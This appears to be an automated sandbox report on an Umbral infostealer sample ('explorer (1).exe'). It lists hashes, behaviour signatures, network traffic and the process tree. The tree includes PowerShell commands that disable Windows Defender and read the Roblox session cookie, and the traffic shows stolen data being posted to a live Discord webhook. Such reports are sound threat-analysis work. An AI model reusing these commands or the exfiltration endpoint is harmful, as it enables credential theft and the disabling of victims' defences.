Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/09/2024, 18:21 UTC

General

  • Target

    explorer (1).exe

  • Size

    1.3MB

  • MD5

    575b9fa5e916d6e0fe48003127c0e7b3

  • SHA1

    ea732f7fcd8e0f20f8c66c8a0ab20880851c2f6e

  • SHA256

    e45dc08a9c9c96afdcbb33dc108417df2ec52ccb0bb1f776bc83770c70ef4739

  • SHA512

    3f337262446aad13ad05589f170149b916692ef4dffd1f005029dcbd01a6e703442d19678641501d466df9f3e264ed946ee39290141fc470ba545725d8fd3f14

  • SSDEEP

    24576:StvMlasKkTqxNx5V27DeEhP959IY9noqx78BXO/1byJRT:0gep23b9IUoqxT/1byJ

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom

Signatures

  • Detect Umbral payload 4 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\explorer (1).exe
    "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:3984
    • C:\Windows\SysWOW64\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Views/modifies file attributes
      PID:1136
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer (1).exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3588
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4412
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4844
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:4572
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • System Location Discovery: System Language Discovery
      • Detects videocard installed
      PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer (1).exe" && pause
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3408
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2832

Network

  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    gstatic.com
    explorer (1).exe
    Remote address:
    8.8.8.8:53
    Request
    gstatic.com
    IN A
    Response
    gstatic.com
    IN A
    216.58.204.67
  • flag-gb
    GET
    https://gstatic.com/generate_204
    explorer (1).exe
    Remote address:
    216.58.204.67:443
    Request
    GET /generate_204 HTTP/1.1
    Host: gstatic.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Content-Length: 0
    Cross-Origin-Resource-Policy: cross-origin
    Date: Mon, 16 Sep 2024 18:21:19 GMT
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    67.204.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.204.58.216.in-addr.arpa
    IN PTR
    Response
    67.204.58.216.in-addr.arpa
    IN PTR
    lhr25s13-in-f31e100net
    67.204.58.216.in-addr.arpa
    IN PTR
    lhr25s13-in-f67�G
    67.204.58.216.in-addr.arpa
    IN PTR
    lhr48s49-in-f3�G
  • flag-us
    DNS
    ip-api.com
    explorer (1).exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    explorer (1).exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 18:21:19 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 58
    X-Rl: 43
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://ip-api.com/json/?fields=225545
    explorer (1).exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/?fields=225545 HTTP/1.1
    Host: ip-api.com
    Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 18:21:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 161
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    explorer (1).exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.135.232
  • flag-us
    POST
    https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom
    explorer (1).exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom HTTP/1.1
    Accept: application/json
    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 940
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Date: Mon, 16 Sep 2024 18:21:28 GMT
    Content-Type: text/html; charset=utf-8
    Connection: keep-alive
    set-cookie: __dcfduid=7d8032bc745811ef893eb28102e9ab66; Expires=Sat, 15-Sep-2029 18:21:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1726510889
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=To43h31f%2Fgo%2FEipgfNZW7IKHkW0qgK93WZRGV9hRUQuF3c2JekXUD%2FvWXhIShhFf0zP1yAqn9xS%2Fgwr2Gu%2FsxzMjH%2BEBVHg4%2FKJgJBe3VACaNuOKhVNRO7x2Vhjj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=7d8032bc745811ef893eb28102e9ab664e2c22bc9078491863689197a0bcf3b14905d4e7b222c301548c4beafffa3b62; Expires=Sat, 15-Sep-2029 18:21:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=1e1381c181a58d0026414c2920ba5716da922fd4-1726510888; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=mmQQGvOma3Ert_5B1PJE3LgDENfMiZV1OFavBqnAEkM-1726510888374-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8c42e05a3d106412-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom
    explorer (1).exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom HTTP/1.1
    Accept: application/json
    User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
    Content-Type: multipart/form-data; boundary="b624e1af-2951-4716-8c83-0d5815c5c8af"
    Host: discord.com
    Cookie: __dcfduid=7d8032bc745811ef893eb28102e9ab66; __sdcfduid=7d8032bc745811ef893eb28102e9ab664e2c22bc9078491863689197a0bcf3b14905d4e7b222c301548c4beafffa3b62; __cfruid=1e1381c181a58d0026414c2920ba5716da922fd4-1726510888; _cfuvid=mmQQGvOma3Ert_5B1PJE3LgDENfMiZV1OFavBqnAEkM-1726510888374-0.0.1.1-604800000
    Content-Length: 427876
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Mon, 16 Sep 2024 18:21:29 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1726510890
    x-ratelimit-reset-after: 1
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYcv4jN8mImcXgddNCDOehMgvt3o3xiX9bM68VdYyr7wqJpDYzsmJttlyD%2FmGo3HaoxX6OuDTLZRAKtGZ6hSsOo98dRXNEgC%2FlZHq4nEskosldqBKNwi5X2rBIqd"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Server: cloudflare
    CF-RAY: 8c42e05c88a66412-LHR
  • flag-us
    DNS
    232.138.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.138.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 216.58.204.67:443
    https://gstatic.com/generate_204
    tls, http
    explorer (1).exe
    724 B
    4.9kB
    8
    8

    HTTP Request

    GET https://gstatic.com/generate_204

    HTTP Response

    204
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    explorer (1).exe
    310 B
    267 B
    5
    2

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/?fields=225545
    http
    explorer (1).exe
    285 B
    510 B
    5
    4

    HTTP Request

    GET http://ip-api.com/json/?fields=225545

    HTTP Response

    200
  • 162.159.138.232:443
    https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom
    tls, http
    explorer (1).exe
    444.4kB
    13.0kB
    331
    161

    HTTP Request

    POST https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom

    HTTP Response

    204

    HTTP Request

    POST https://discord.com/api/webhooks/1285146489047220246/6vaVojXPUSotwltFctwpYZfgInpOOjizCsR1Uwtcyb0_147wBk4FcBkKK4kpNTvlzaom

    HTTP Response

    200
  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    gstatic.com
    dns
    explorer (1).exe
    57 B
    73 B
    1
    1

    DNS Request

    gstatic.com

    DNS Response

    216.58.204.67

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    67.204.58.216.in-addr.arpa
    dns
    72 B
    169 B
    1
    1

    DNS Request

    67.204.58.216.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    explorer (1).exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    discord.com
    dns
    explorer (1).exe
    57 B
    137 B
    1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.138.232
    162.159.137.232
    162.159.136.232
    162.159.128.233
    162.159.135.232

  • 8.8.8.8:53
    232.138.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    232.138.159.162.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    78085515614fa352c2e30ff050cd06a3

    SHA1

    bc057d8adf14372e2d62ef70fa62482783e408da

    SHA256

    f66b96adb56be3a00663094179de324f8b02cf1ff0cd732c954cbdb9c1d3195d

    SHA512

    5a012ad492a3119f5413302d13e165c516df1d6e8af9c606d194378ebee759d6e0866d730f36795672fed24c5ccdd9135bc5b64671ed03c2d4e88b3c6e0cb56d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    5e75ee31b7e34ba3669f9af64dab0358

    SHA1

    41ff4a90bacdc1003476152145febd40654e36d2

    SHA256

    ed15715eb8455efc2a223c2eebd883384933ddfba48751d513a9d9dcb5402509

    SHA512

    a5db964b7c78c504f16d39791ff3c7e45be78fab8c912e5fe13c8a6f6ae147288a8d49346265d33fd164667852af3cc72c2124b4dcfd6e313d8a80b8ebf34fe8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    c4fd743ec3f49eae45150d7c7736f446

    SHA1

    6a28da1291d4477c07d5727a43b688509e2d0dba

    SHA256

    ac4753cb1c79be0ff7b38a9e0603545c7bd0bac2a0ad8c354ccae24784c42aca

    SHA512

    11968c19761ad05a6e53c7c825323e65b011cab5b6f2c9ff05c74c4acabc263847a2f7f128404b736e7af6301302253c6b12863040eaad97e228effe1701c552

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    14KB

    MD5

    4ebde9c03347e319b051bd1b6f2b4142

    SHA1

    f7cd5ab154e90662affba628412cdc840c15813a

    SHA256

    6a824610ec3281d64ea8a72afe8634cfa430e63d175ffbc910adfc21bb0ab613

    SHA512

    5ee84e6b96302a668da8b2aed8d66389cec39863dc72f4c25b3e800f1273d325ae39b3cb4458acfb387dcb3971adbd47716faec83d628a0edf8fde33ba8547ac

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h5m2lmbj.zue.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/904-5-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-4-0x0000000007AF0000-0x0000000008094000-memory.dmp

    Filesize

    5.6MB

  • memory/904-131-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-136-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-114-0x000000000AEC0000-0x000000000AED2000-memory.dmp

    Filesize

    72KB

  • memory/904-113-0x000000000A090000-0x000000000A09A000-memory.dmp

    Filesize

    40KB

  • memory/904-51-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-111-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/904-0-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-135-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-97-0x00000000744DE000-0x00000000744DF000-memory.dmp

    Filesize

    4KB

  • memory/904-3-0x00000000074A0000-0x0000000007532000-memory.dmp

    Filesize

    584KB

  • memory/904-72-0x0000000009D70000-0x0000000009D8E000-memory.dmp

    Filesize

    120KB

  • memory/904-70-0x0000000009A10000-0x0000000009A86000-memory.dmp

    Filesize

    472KB

  • memory/904-71-0x0000000009CE0000-0x0000000009D30000-memory.dmp

    Filesize

    320KB

  • memory/904-2-0x00000000003D0000-0x000000000086E000-memory.dmp

    Filesize

    4.6MB

  • memory/904-1-0x00000000744DE000-0x00000000744DF000-memory.dmp

    Filesize

    4KB

  • memory/1840-10-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

    Filesize

    136KB

  • memory/1840-27-0x0000000070370000-0x00000000703BC000-memory.dmp

    Filesize

    304KB

  • memory/1840-43-0x0000000007190000-0x00000000071AA000-memory.dmp

    Filesize

    104KB

  • memory/1840-42-0x00000000077D0000-0x0000000007E4A000-memory.dmp

    Filesize

    6.5MB

  • memory/1840-44-0x0000000007200000-0x000000000720A000-memory.dmp

    Filesize

    40KB

  • memory/1840-45-0x0000000007410000-0x00000000074A6000-memory.dmp

    Filesize

    600KB

  • memory/1840-46-0x0000000007390000-0x00000000073A1000-memory.dmp

    Filesize

    68KB

  • memory/1840-47-0x00000000073C0000-0x00000000073CE000-memory.dmp

    Filesize

    56KB

  • memory/1840-48-0x00000000073D0000-0x00000000073E4000-memory.dmp

    Filesize

    80KB

  • memory/1840-49-0x00000000074D0000-0x00000000074EA000-memory.dmp

    Filesize

    104KB

  • memory/1840-50-0x00000000074B0000-0x00000000074B8000-memory.dmp

    Filesize

    32KB

  • memory/1840-40-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-54-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-39-0x0000000007060000-0x0000000007103000-memory.dmp

    Filesize

    652KB

  • memory/1840-6-0x0000000004900000-0x0000000004936000-memory.dmp

    Filesize

    216KB

  • memory/1840-38-0x0000000006440000-0x000000000645E000-memory.dmp

    Filesize

    120KB

  • memory/1840-26-0x0000000007020000-0x0000000007052000-memory.dmp

    Filesize

    200KB

  • memory/1840-41-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-28-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-8-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-25-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

    Filesize

    304KB

  • memory/1840-7-0x0000000005070000-0x0000000005698000-memory.dmp

    Filesize

    6.2MB

  • memory/1840-24-0x0000000005E60000-0x0000000005E7E000-memory.dmp

    Filesize

    120KB

  • memory/1840-9-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-23-0x0000000005840000-0x0000000005B94000-memory.dmp

    Filesize

    3.3MB

  • memory/1840-13-0x00000000744D0000-0x0000000074C80000-memory.dmp

    Filesize

    7.7MB

  • memory/1840-12-0x0000000005710000-0x0000000005776000-memory.dmp

    Filesize

    408KB

  • memory/1840-11-0x00000000056A0000-0x0000000005706000-memory.dmp

    Filesize

    408KB

  • memory/3108-61-0x0000000005F60000-0x00000000062B4000-memory.dmp

    Filesize

    3.3MB

  • memory/3588-98-0x0000000006930000-0x0000000006952000-memory.dmp

    Filesize

    136KB

  • memory/3588-96-0x0000000006460000-0x00000000064AC000-memory.dmp

    Filesize

    304KB

  • memory/3588-94-0x0000000005D70000-0x00000000060C4000-memory.dmp

    Filesize

    3.3MB

  • memory/4572-117-0x0000000006160000-0x00000000064B4000-memory.dmp

    Filesize

    3.3MB

  • memory/4572-128-0x00000000068A0000-0x00000000068EC000-memory.dmp

    Filesize

    304KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.